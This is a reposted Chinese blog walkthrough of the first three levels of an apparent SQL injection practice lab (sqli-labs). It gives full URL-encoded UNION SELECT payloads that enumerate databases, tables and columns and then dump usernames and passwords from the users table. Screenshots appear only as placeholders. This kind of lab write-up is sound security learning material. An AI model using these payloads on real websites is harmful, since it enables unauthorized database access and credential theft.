我是靠谱客的博主 奋斗柚子,最近开发中收集的这篇文章主要介绍SQL注入练习,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

第一关

题目链接:http://43.247.91.228:84/Less-1

首先进行注入点测试。
在这里插入图片描述

通过报错我们知道这个是mysql数据库,而且使用单引号闭合,后台语句估计是
Select username from ‘{$id}’;

然后我们使用order by测试数据库当前列数。
在这里插入图片描述
接下来使用union查询来判断页面可回显的点。
在这里插入图片描述

我们通过联合查询来查看数据库的名字以及一些信息。
命令:1’ union select 1,database(),version()–+

在这里插入图片描述

查看当前所有的数据库。
-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata–+

在这里插入图片描述

查看当前所有的表名:
-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27–+

在这里插入图片描述

查看当前数据表的所有列名:
-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27–+
在这里插入图片描述

查看当前数据库的所有账号密码:
http://43.247.91.228:84/Less-1/?id=-1%27%20union%20select%201,group_concat(username),group_concat(password)from%20users–+

在这里插入图片描述

第二关

题目链接:http://43.247.91.228:84/Less-2/

单引号测试注入点,推断当前sql语句为:select username from xxx where id=id
在这里插入图片描述
判断当前数据表列数
在这里插入图片描述

判断回显点
在这里插入图片描述

获取所有数据库名:
在这里插入图片描述

获取所有表名:
id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27–
在这里插入图片描述

获取所有列名:
id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27–
在这里插入图片描述
爆库:
1%20union%20select%201,group_concat(username),group_concat(password)%20from%20users-
在这里插入图片描述

第三关:

题目链接:http://43.247.91.228:84/Less-3/

?id=1%27)%20order%20by%204–+
判断注入点:
在这里插入图片描述

判断页面回显点:
在这里插入图片描述

爆出所有的数据库:
-1%27)%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata–+
在这里插入图片描述

爆表名:
id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20%20where%20table_schema=%27security%27–+
在这里插入图片描述

爆列名:
-1%27)%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20%20where%20table_schema=%27security%27–+

在这里插入图片描述

暴库:
id=-1%27)%20union%20select%201,group_concat(username),group_concat(password)from%20users–+
在这里插入图片描述

最后

以上就是奋斗柚子为你收集整理的SQL注入练习的全部内容,希望文章能够帮你解决SQL注入练习所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(55)

评论列表共有 0 条评论

立即
投稿
返回
顶部